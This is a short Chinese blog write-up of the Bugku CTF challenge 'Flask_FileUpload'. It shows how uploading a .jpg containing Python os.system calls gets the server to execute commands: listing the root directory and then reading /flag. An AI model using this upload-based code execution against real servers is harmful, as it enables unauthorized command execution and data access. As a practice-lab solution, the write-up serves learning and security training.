技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
玫城
5 小时前
[ VUE ] 封装通用数组校验组件,el-input内使用
前端·javascript·vue.js
hele_two
6 小时前
快速幂算法
c++·python·算法
l1t
6 小时前
利用DeepSeek将python DLX求解数独程序格式化并改成3.x版本
开发语言·python·算法·数独
Cemtery116
8 小时前
Day26 常见的降维算法
人工智能·python·算法·机器学习
星空椰
9 小时前
快速掌握FastAPI:高效构建Web API
python·fastapi
塔尖尖儿
9 小时前
Python中range()到底是什么演示
python
南半球与北海道#
10 小时前
前端打印(三联纸票据打印)
前端·vue.js·打印
Ethan-D
10 小时前
#每日一题19 回溯 + 全排列思想
java·开发语言·python·算法·leetcode
董世昌41
10 小时前
深入浅出 JavaScript 常用事件:从原理到实战的全维度解析
前端
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04Linux下V2Ray安装配置指南05UV安装并设置国内源06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Claude Code Skills 实用使用手册09Labelme从安装到标注:零基础完整指南10BongoCat - 跨平台键盘猫动画工具